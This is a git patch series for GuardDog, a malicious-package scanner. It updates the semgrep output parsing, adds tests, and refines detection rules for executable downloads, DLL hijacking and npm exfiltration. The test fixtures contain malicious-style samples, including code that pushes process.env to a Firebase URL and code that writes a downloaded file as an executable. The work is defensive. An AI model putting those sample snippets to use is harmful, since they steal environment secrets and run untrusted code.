From 1585bb7123633a09f4c0b939bda3b75f5bc15fe8 Mon Sep 17 00:00:00 2001 From: Sebastian Obregoso Date: Mon, 13 Jan 2025 18:06:10 +0100 Subject: [PATCH 1/4] adding support for latest semgrep output --- guarddog/analyzer/analyzer.py | 39 ++++++++- poetry.lock | 30 +++---- pyproject.toml | 2 +- tests/core/test_sourcecode_analyzer.py | 106 ++++++++++++++++++++++--- 4 files changed, 148 insertions(+), 29 deletions(-) diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 6b965b5a..6d252798 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -333,15 +333,19 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None): for result in response["results"]: rule_name = rule or result["check_id"].split(".")[-1] - code_snippet = result["extra"]["lines"] - line = result["start"]["line"] + start_line = result["start"]["line"] + end_line = result["end"]["line"] file_path = os.path.abspath(result["path"]) + code = self.trim_code_snippet( + self.get_snippet( + file_path=file_path, start_line=start_line, end_line=end_line + ) + ) if targetpath: file_path = os.path.relpath(file_path, targetpath) - location = file_path + ":" + str(line) - code = self.trim_code_snippet(code_snippet) + location = file_path + ":" + str(start_line) finding = { 'location': location, @@ -356,6 +360,33 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None): return results + def get_snippet(self, file_path: str, start_line: int, end_line: int) -> str: + """ + Returns the code snippet between start_line and stop_line in a file + + Args: + path (str): path to file + start_line (int): starting line number + end_line (int): ending line number + + Returns: + str: code snippet + """ + snippet = [] + try: + with open(file_path, 'r') as file: + for current_line_number, line in enumerate(file, start=1): + if start_line <= current_line_number <= end_line: + snippet.append(line) + elif current_line_number > end_line: + break + except FileNotFoundError: + log.error(f"File not found: {file_path}") + except Exception as e: + log.error(f"Error reading file {file_path}: {str(e)}") + + return ''.join(snippet) + # Makes sure the matching code to be displayed isn't too long def trim_code_snippet(self, code): THRESHOLD = 250 diff --git a/poetry.lock b/poetry.lock index db95d041..72cf723d 100644 --- a/poetry.lock +++ b/poetry.lock @@ -1912,20 +1912,20 @@ jupyter = ["ipywidgets (>=7.5.1,<9)"] [[package]] name = "ruamel-yaml" -version = "0.17.32" +version = "0.18.10" description = "ruamel.yaml is a YAML parser/emitter that supports roundtrip preservation of comments, seq/map flow style, and map key order" optional = false -python-versions = ">=3" +python-versions = ">=3.7" files = [ - {file = "ruamel.yaml-0.17.32-py3-none-any.whl", hash = "sha256:23cd2ed620231677564646b0c6a89d138b6822a0d78656df7abda5879ec4f447"}, - {file = "ruamel.yaml-0.17.32.tar.gz", hash = "sha256:ec939063761914e14542972a5cba6d33c23b0859ab6342f61cf070cfc600efc2"}, + {file = "ruamel.yaml-0.18.10-py3-none-any.whl", hash = "sha256:30f22513ab2301b3d2b577adc121c6471f28734d3d9728581245f1e76468b4f1"}, + {file = "ruamel.yaml-0.18.10.tar.gz", hash = "sha256:20c86ab29ac2153f80a428e1254a8adf686d3383df04490514ca3b79a362db58"}, ] [package.dependencies] -"ruamel.yaml.clib" = {version = ">=0.2.7", markers = "platform_python_implementation == \"CPython\" and python_version < \"3.12\""} +"ruamel.yaml.clib" = {version = ">=0.2.7", markers = "platform_python_implementation == \"CPython\" and python_version < \"3.13\""} [package.extras] -docs = ["ryd"] +docs = ["mercurial (>5.7)", "ryd"] jinja2 = ["ruamel.yaml.jinja2 (>=0.2)"] [[package]] @@ -2009,16 +2009,16 @@ doc = ["Sphinx", "sphinx-rtd-theme"] [[package]] name = "semgrep" -version = "1.97.0" +version = "1.102.0" description = "Lightweight static analysis for many languages. Find bug variants with patterns that look like source code." optional = false -python-versions = ">=3.8" +python-versions = ">=3.9" files = [ - {file = "semgrep-1.97.0-cp38.cp39.cp310.cp311.py37.py38.py39.py310.py311-none-macosx_10_14_x86_64.whl", hash = "sha256:0ddaa25ee45e669e1fef87e88dcef73b2aee0874b507e09f618862c42452a205"}, - {file = "semgrep-1.97.0-cp38.cp39.cp310.cp311.py37.py38.py39.py310.py311-none-macosx_11_0_arm64.whl", hash = "sha256:9184500bf8c49ad19d0fb2d84923abb4aa53058b0ece7008b57a3b0b5e6ce3ee"}, - {file = "semgrep-1.97.0-cp38.cp39.cp310.cp311.py37.py38.py39.py310.py311-none-musllinux_1_0_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f7d21d6499d4e6fafb4c0b04b1750e9f4b704a26bd78f0aff19f1c73d44843b4"}, - {file = "semgrep-1.97.0-cp38.cp39.cp310.cp311.py37.py38.py39.py310.py311-none-musllinux_1_0_x86_64.manylinux2014_x86_64.whl", hash = "sha256:996fe0b2bfac3a4d4511e470fdf5f3bca96b1f794f398e0336c8388802c218de"}, - {file = "semgrep-1.97.0.tar.gz", hash = "sha256:c585164358e03cd7868e1f0d38fbcb422c88dbe08795b83caeb5e36cf18874aa"}, + {file = "semgrep-1.102.0-cp39.cp310.cp311.py39.py310.py311-none-macosx_10_14_x86_64.whl", hash = "sha256:3dde482445a817ce183acfc5740979fc95f8ebe9a24b223f54802c57f406c360"}, + {file = "semgrep-1.102.0-cp39.cp310.cp311.py39.py310.py311-none-macosx_11_0_arm64.whl", hash = "sha256:1b5c127bffbafdd2d4b587c50266466ad4a7d187dee1560de7b99fdc22fe1639"}, + {file = "semgrep-1.102.0-cp39.cp310.cp311.py39.py310.py311-none-musllinux_1_0_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70fec99b48cae45a47c34dc8be4486ca7e2b2686ec3d08be51f0dcfbcaa516f5"}, + {file = "semgrep-1.102.0-cp39.cp310.cp311.py39.py310.py311-none-musllinux_1_0_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4afc25fedae9db030573cab96a162bfc71cc414d00d7040ac179a8c3e88c7bf8"}, + {file = "semgrep-1.102.0.tar.gz", hash = "sha256:7a0e3a90f49bdd322ba623c6e4680220b4fe2d27300e2ada448466cd718658d5"}, ] [package.dependencies] @@ -2039,7 +2039,7 @@ packaging = ">=21.0" peewee = ">=3.14,<4.0" requests = ">=2.22,<3.0" rich = ">=13.5.2,<13.6.0" -"ruamel.yaml" = ">=0.16.0,<0.18" +"ruamel.yaml" = ">=0.18.5" tomli = ">=2.0.1,<2.1.0" typing-extensions = ">=4.2,<5.0" urllib3 = ">=2.0,<3.0" @@ -2350,4 +2350,4 @@ type = ["pytest-mypy"] [metadata] lock-version = "2.0" python-versions = ">=3.10,<4" -content-hash = "5eb9f8c6eeea913f137cac65f035e9b7a48272b13fa4d14fc600b750ae123ff3" +content-hash = "537d82faf80d00fb725711e18b9ce73d25d162dce77b26c29d8d552b4c4e948a" diff --git a/pyproject.toml b/pyproject.toml index 9b4e9dd8..e9cec9c4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -12,7 +12,7 @@ guarddog = "guarddog.cli:cli" [tool.poetry.dependencies] python = ">=3.10,<4" -semgrep = "1.97.0" +semgrep = "^1.102.0" requests = "^2.29.0" python-dateutil = "^2.8.2" click = "^8.1.3" diff --git a/tests/core/test_sourcecode_analyzer.py b/tests/core/test_sourcecode_analyzer.py index bf5743aa..e55fbce1 100644 --- a/tests/core/test_sourcecode_analyzer.py +++ b/tests/core/test_sourcecode_analyzer.py @@ -1,17 +1,22 @@ -from guarddog import ecosystems -from guarddog.analyzer.analyzer import Analyzer +import json +from unittest.mock import mock_open, patch + import pytest +from guarddog import ecosystems +from guarddog.analyzer.analyzer import Analyzer pypi_analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) npm_analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.NPM) + + @pytest.mark.parametrize( - "analyzer", - [ - (pypi_analyzer), - (npm_analyzer), - ], - ) + "analyzer", + [ + (pypi_analyzer), + (npm_analyzer), + ], +) def test_source_code_analyzer_ran_with_no_rules(analyzer: Analyzer): """ Regression test for https://github.com/DataDog/guarddog/issues/161 @@ -19,4 +24,87 @@ def test_source_code_analyzer_ran_with_no_rules(analyzer: Analyzer): analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) result = analyzer.analyze_sourcecode("/tmp", set()) - assert len(result['errors']) == 0 + assert len(result["errors"]) == 0 + + +def test_source_code_analyzer_format(): + analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) + + file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n" + expected_snippet = "line 2 content\nline 3 content\nline 4 content\n" + # Sample output from semgrep + sample_output = """ + { + "version": "1.0.0", + "results": [ + { + "check_id": "guarddog.analyzer.sourcecode.sample_rule", + "path": "/tmp/sample.py", + "start": { + "line": 2 + }, + "end": { + "line": 4 + }, + "extra": { + "message": "message", + "metadata": { + "description": "description" + }, + "severity": "WARNING" + } + } + ], + "errors": [], + "paths": { + "scanned": [ + "/tmp/sample.py" + ] + }, + "skipped_rules": [] + } + """ + + with patch("builtins.open", mock_open(read_data=file_content)): + output = analyzer._format_semgrep_response(json.loads(sample_output)) + assert output.get("sample_rule")[0].get("code") == expected_snippet + + +def test_get_snippet_valid_range(): + analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) + path = "/tmp/sample.py" + start_line = 2 + stop_line = 4 + file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n" + expected_snippet = "line 2 content\nline 3 content\nline 4 content\n" + + with patch("builtins.open", mock_open(read_data=file_content)): + snippet = analyzer.get_snippet(path, start_line, stop_line) + + assert snippet == expected_snippet + + +def test_get_snippet_out_of_range(): + analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) + path = "/tmp/sample.py" + start_line = 10 + stop_line = 20 + file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n" + expected_snippet = "" + + with patch("builtins.open", mock_open(read_data=file_content)): + snippet = analyzer.get_snippet(path, start_line, stop_line) + + assert snippet == expected_snippet + + +def test_get_snippet_file_not_found(): + analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI) + path = "/tmp/non_existent_file.py" + start_line = 2 + stop_line = 4 + + with patch("builtins.open", side_effect=FileNotFoundError): + snippet = analyzer.get_snippet(path, start_line, stop_line) + + assert snippet == "" From 5b70b79fbdfa9ea1826cf3954d0e80109ded46d4 Mon Sep 17 00:00:00 2001 From: Sebastian Obregoso Date: Mon, 13 Jan 2025 18:40:51 +0100 Subject: [PATCH 2/4] fix pypi download exec --- guarddog/analyzer/sourcecode/download-executable.yml | 12 ++++++++++-- tests/analyzer/sourcecode/download-executable.py | 2 +- 2 files changed, 11 insertions(+), 3 deletions(-) diff --git a/guarddog/analyzer/sourcecode/download-executable.yml b/guarddog/analyzer/sourcecode/download-executable.yml index 22214475..1eb6f89f 100644 --- a/guarddog/analyzer/sourcecode/download-executable.yml +++ b/guarddog/analyzer/sourcecode/download-executable.yml @@ -12,6 +12,10 @@ rules: - pattern-either: - pattern: (...).urlretrieve(...,$EXE) - pattern: open($EXE, ...).write($REQUEST) + - pattern: | + $FILE = open($EXE, ...) + ... + $FILE.write($REQUEST) - pattern: | with open($EXE, ...) as $FILE: ... @@ -30,6 +34,12 @@ rules: ... $MAKE_EXEC + - pattern: | + $FILE = open($LOC, ...) + ... + $FILE.write($REQUEST) + ... + $MAKE_EXEC - pattern: | open($LOC, ...).write($REQUEST) ... @@ -93,5 +103,3 @@ rules: requests.get(...) ... severity: WARNING - options: - symbolic_propagation: true diff --git a/tests/analyzer/sourcecode/download-executable.py b/tests/analyzer/sourcecode/download-executable.py index 1dac8f04..0115f34e 100644 --- a/tests/analyzer/sourcecode/download-executable.py +++ b/tests/analyzer/sourcecode/download-executable.py @@ -29,8 +29,8 @@ def f(): connection.request("GET", PATH) response = connecton.getresponse().read() os.chdir(os.path.expanduser("~")) - d = open(LOC, "wb") # ruleid: download-executable + d = open(LOC, "wb") d.write(response) d.close() current_state = os.stat(LOC) From 0e3142f61a227a2ad5d0ef1190fdfb3fb844cec9 Mon Sep 17 00:00:00 2001 From: Sebastian Obregoso Date: Mon, 13 Jan 2025 18:55:13 +0100 Subject: [PATCH 3/4] fix dll hijacking --- guarddog/analyzer/sourcecode/dll-hijacking.yml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/guarddog/analyzer/sourcecode/dll-hijacking.yml b/guarddog/analyzer/sourcecode/dll-hijacking.yml index e16dd706..94f7786b 100644 --- a/guarddog/analyzer/sourcecode/dll-hijacking.yml +++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml @@ -62,11 +62,17 @@ rules: - patterns: # write a library to disk - patterns: - - pattern: | - ... - open($DLL,'wb') - ... - $FN(...,$EXE,...) + - pattern-either: + - pattern: | + ... + with open($DLL,'wb') as $FILE: + ... + $FN(...,$EXE,...) + - pattern: | + ... + $FILE = open($DLL,'wb') + ... + $FN(...,$EXE,...) - metavariable-pattern: metavariable: $EXE patterns: @@ -82,5 +88,3 @@ rules: - focus-metavariable: $DLL severity: WARNING - options: - symbolic_propagation: true From 57cffa813c97efd730d08e2818989b9fb7731c8a Mon Sep 17 00:00:00 2001 From: Sebastian Obregoso Date: Mon, 13 Jan 2025 19:03:35 +0100 Subject: [PATCH 4/4] fixed pending cases --- guarddog/analyzer/sourcecode/npm-dll-hijacking.yml | 2 -- .../analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml | 8 +++++--- guarddog/analyzer/sourcecode/npm-obfuscation.yml | 2 -- .../analyzer/sourcecode/npm-exfiltrate-sensitive-data.js | 4 ++-- 4 files changed, 7 insertions(+), 9 deletions(-) diff --git a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml index 9388e8f7..5fcd614d 100644 --- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml +++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml @@ -86,5 +86,3 @@ rules: - focus-metavariable: $DLL severity: WARNING - options: - symbolic_propagation: true diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml index 0a4110df..f285d8b5 100644 --- a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml @@ -84,12 +84,14 @@ rules: - pattern: $HTTP. ... .request(...) - pattern: $HTTP. ... .get(...) - pattern: $HTTP. ... .post(...) - - pattern: $HTTP. ... .push(...) + - pattern: | + $FIRE=$HTTP.child(...) + ... + $FIRE.push(...) - pattern: $HTTP. ... .write(...) - pattern: $HTTP(...) languages: - javascript - typescript severity: WARNING - options: - symbolic_propagation: true + diff --git a/guarddog/analyzer/sourcecode/npm-obfuscation.yml b/guarddog/analyzer/sourcecode/npm-obfuscation.yml index 5cc936e9..dffa30fa 100644 --- a/guarddog/analyzer/sourcecode/npm-obfuscation.yml +++ b/guarddog/analyzer/sourcecode/npm-obfuscation.yml @@ -60,5 +60,3 @@ rules: languages: - javascript severity: WARNING - options: - symbolic_propagation: true diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js index f625f89c..234359e1 100644 --- a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js +++ b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js @@ -66,8 +66,8 @@ function f(){ function f(){ var Firebase = require("firebase"); var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/"); - var dbRef = ref.child("env_vars"); // ruleid: npm-exfiltrate-sensitive-data + var dbRef = ref.child("env_vars"); dbRef.push({status : "leaked env vars", message : process.env}, clean()); } @@ -75,8 +75,8 @@ function f(){ function f(){ var Firebase = require("firebase"); var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/"); - var dbRef = ref.child("env_vars"); // ok: npm-exfiltrate-sensitive-data + var dbRef = ref.child("env_vars"); dbRef.push({status : "leaked env vars", message : "anymsg"}, clean()); }